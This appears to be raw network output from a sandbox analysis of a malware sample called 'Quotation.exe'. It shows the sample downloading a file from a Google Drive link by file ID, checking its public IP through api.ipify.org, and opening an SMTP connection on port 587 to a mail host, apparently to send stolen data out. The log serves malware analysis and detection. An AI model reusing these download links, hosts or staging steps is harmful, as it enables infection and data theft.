                                                                                          Nov 11, 2024 11:50:10.536211967 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.537554979 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.537563086 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.537606001 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.540241957 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.540319920 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.540327072 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.540364027 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.543845892 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.545495033 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.545505047 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.547750950 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.547816992 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.547830105 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.549474001 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.551551104 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.553502083 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.553512096 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.553555965 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.585405111 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.585478067 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.585508108 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.585546017 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.585577965 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.585592031 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.585609913 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.585643053 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.585654020 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.586070061 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.586117983 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.586123943 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.586134911 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.586162090 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.586189032 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.586460114 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.586510897 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.586538076 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.586560965 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.586569071 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.586580038 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.586604118 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.586611986 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.586617947 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.586653948 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.587244987 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.587295055 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.587342978 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.587351084 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.587389946 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.587764978 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.589865923 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.589900017 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.589915037 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.589922905 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.589939117 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.589958906 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.591917992 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.594027042 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.594054937 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.594079018 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.594088078 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.594105959 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.594130039 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.596385956 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.598026991 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.598054886 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.598087072 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.598115921 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.598129034 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.599452019 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.600048065 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.602340937 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.602371931 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.602396011 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.602407932 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.602432013 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.602441072 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.603861094 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.606034994 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.606065035 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.606091976 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.606105089 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.606129885 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.606142998 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.607862949 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.609960079 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.610018969 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.610045910 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.610055923 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.610115051 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.611605883 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.613507986 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.613543987 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.613575935 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.613590956 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.613600016 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.613676071 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.615555048 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.617208958 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.617273092 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.617280960 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.617295980 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.617340088 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.618946075 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.619067907 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.619074106 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.619115114 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.620934010 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.622633934 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.622642040 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.622683048 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.622688055 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.622737885 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.622742891 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.622773886 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.624753952 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.626091957 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.626147985 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.626156092 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.627542973 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.627549887 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.627599955 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.627852917 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.629726887 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.629800081 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.629801035 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.629813910 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.629853010 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.631433964 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.633045912 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.633135080 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.633143902 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.634839058 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.634895086 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.634902954 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.634912014 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.634965897 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.636533022 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.638083935 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.638139009 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.638148069 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.638185978 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.638190985 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.638205051 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.638242006 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.639729977 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.641508102 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.641563892 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.641578913 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.641587973 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.641602993 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.641625881 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.643199921 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.643260956 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.666758060 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.666882038 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.666934967 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.666982889 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.666996002 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.667005062 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.667038918 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.667061090 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.667064905 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.667109013 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.667149067 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.667152882 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.667162895 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.667208910 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.667213917 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.667247057 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.667251110 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.667741060 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.667783022 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.667788982 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.667838097 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.667880058 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.667885065 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.667923927 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.667927980 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.668447018 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.668493986 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.668495893 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.668509960 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.668566942 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.668570995 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.668617964 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.668622017 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.668679953 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.668729067 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.668735981 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.668740988 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.668787003 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.668787003 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.669125080 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.669203043 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.669250965 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.669250965 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.669262886 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.669302940 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.669307947 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.669518948 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.669523001 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.673458099 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.704982996 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.705056906 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.705125093 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:11.342868090 CET49908443192.168.2.9172.67.74.152
                                                                                          Nov 11, 2024 11:50:11.342919111 CET44349908172.67.74.152192.168.2.9
                                                                                          Nov 11, 2024 11:50:11.343020916 CET49908443192.168.2.9172.67.74.152
                                                                                          Nov 11, 2024 11:50:11.347214937 CET49908443192.168.2.9172.67.74.152
                                                                                          Nov 11, 2024 11:50:11.347229004 CET44349908172.67.74.152192.168.2.9
                                                                                          Nov 11, 2024 11:50:11.777080059 CET44349908172.67.74.152192.168.2.9
                                                                                          Nov 11, 2024 11:50:11.777209044 CET49908443192.168.2.9172.67.74.152
                                                                                          Nov 11, 2024 11:50:11.779336929 CET49908443192.168.2.9172.67.74.152
                                                                                          Nov 11, 2024 11:50:11.779345989 CET44349908172.67.74.152192.168.2.9
                                                                                          Nov 11, 2024 11:50:11.779587030 CET44349908172.67.74.152192.168.2.9
                                                                                          Nov 11, 2024 11:50:11.783458948 CET49908443192.168.2.9172.67.74.152
                                                                                          Nov 11, 2024 11:50:11.831327915 CET44349908172.67.74.152192.168.2.9
                                                                                          Nov 11, 2024 11:50:11.880646944 CET44349908172.67.74.152192.168.2.9
                                                                                          Nov 11, 2024 11:50:11.880736113 CET44349908172.67.74.152192.168.2.9
                                                                                          Nov 11, 2024 11:50:11.880786896 CET49908443192.168.2.9172.67.74.152
                                                                                          Nov 11, 2024 11:50:11.887233973 CET49908443192.168.2.9172.67.74.152
                                                                                          Nov 11, 2024 11:50:13.505743027 CET49929587192.168.2.967.23.226.139
                                                                                          Nov 11, 2024 11:50:13.510615110 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:13.510701895 CET49929587192.168.2.967.23.226.139
                                                                                          Nov 11, 2024 11:50:14.159353018 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.159611940 CET49929587192.168.2.967.23.226.139
                                                                                          Nov 11, 2024 11:50:14.164463043 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.284239054 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.284497976 CET49929587192.168.2.967.23.226.139
                                                                                          Nov 11, 2024 11:50:14.290013075 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.411748886 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.412260056 CET49929587192.168.2.967.23.226.139
                                                                                          Nov 11, 2024 11:50:14.417428970 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.553319931 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.553349972 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.553421021 CET49929587192.168.2.967.23.226.139
                                                                                          Nov 11, 2024 11:50:14.554929972 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.554943085 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.554954052 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.554977894 CET49929587192.168.2.967.23.226.139
                                                                                          Nov 11, 2024 11:50:14.569202900 CET49929587192.168.2.967.23.226.139
                                                                                          Nov 11, 2024 11:50:14.575691938 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.703959942 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.711230993 CET49929587192.168.2.967.23.226.139
                                                                                          Nov 11, 2024 11:50:14.716037035 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.836177111 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.837192059 CET49929587192.168.2.967.23.226.139
                                                                                          Nov 11, 2024 11:50:14.841988087 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.977323055 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:14.978287935 CET49929587192.168.2.967.23.226.139
                                                                                          Nov 11, 2024 11:50:14.983117104 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:17.420062065 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:17.420300961 CET49929587192.168.2.967.23.226.139
                                                                                          Nov 11, 2024 11:50:17.425052881 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:17.544123888 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:17.559551954 CET49929587192.168.2.967.23.226.139
                                                                                          Nov 11, 2024 11:50:17.564712048 CET5874992967.23.226.139192.168.2.9
                                                                                          Nov 11, 2024 11:50:17.564788103 CET49929587192.168.2.967.23.226.139
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 11, 2024 11:50:06.141904116 CET5290753192.168.2.91.1.1.1
                                                                                          Nov 11, 2024 11:50:06.148865938 CET53529071.1.1.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:07.176489115 CET5588853192.168.2.91.1.1.1
                                                                                          Nov 11, 2024 11:50:07.183182001 CET53558881.1.1.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:11.313091040 CET6524953192.168.2.91.1.1.1
                                                                                          Nov 11, 2024 11:50:11.337268114 CET53652491.1.1.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:12.748152018 CET6440053192.168.2.91.1.1.1
                                                                                          Nov 11, 2024 11:50:13.504291058 CET53644001.1.1.1192.168.2.9
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Nov 11, 2024 11:50:06.141904116 CET192.168.2.91.1.1.10x957bStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                          Nov 11, 2024 11:50:07.176489115 CET192.168.2.91.1.1.10xe15aStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                          Nov 11, 2024 11:50:11.313091040 CET192.168.2.91.1.1.10x50f8Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                          Nov 11, 2024 11:50:12.748152018 CET192.168.2.91.1.1.10x3da4Standard query (0)mail.showpiece.trillennium.bizA (IP address)IN (0x0001)false
                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Nov 11, 2024 11:50:06.148865938 CET1.1.1.1192.168.2.90x957bNo error (0)drive.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                          Nov 11, 2024 11:50:07.183182001 CET1.1.1.1192.168.2.90xe15aNo error (0)drive.usercontent.google.com172.217.18.1A (IP address)IN (0x0001)false
                                                                                          Nov 11, 2024 11:50:11.337268114 CET1.1.1.1192.168.2.90x50f8No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                          Nov 11, 2024 11:50:11.337268114 CET1.1.1.1192.168.2.90x50f8No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                          Nov 11, 2024 11:50:11.337268114 CET1.1.1.1192.168.2.90x50f8No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                          Nov 11, 2024 11:50:13.504291058 CET1.1.1.1192.168.2.90x3da4No error (0)mail.showpiece.trillennium.bizshowpiece.trillennium.bizCNAME (Canonical name)IN (0x0001)false
                                                                                          Nov 11, 2024 11:50:13.504291058 CET1.1.1.1192.168.2.90x3da4No error (0)showpiece.trillennium.biz67.23.226.139A (IP address)IN (0x0001)false
                                                                                          • drive.google.com
                                                                                          • drive.usercontent.google.com
                                                                                          • api.ipify.org
                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.949868142.250.186.784434068C:\Users\user\Desktop\Quotation.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-11 10:50:06 UTC216OUTGET /uc?export=download&id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          2024-11-11 10:50:07 UTC1766INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Mon, 11 Nov 2024 10:50:07 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: script-src 'nonce-i7dHRI77imHZxYt8IxEVrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.949877172.217.18.14434068C:\Users\user\Desktop\Quotation.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-11 10:50:07 UTC258OUTGET /download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
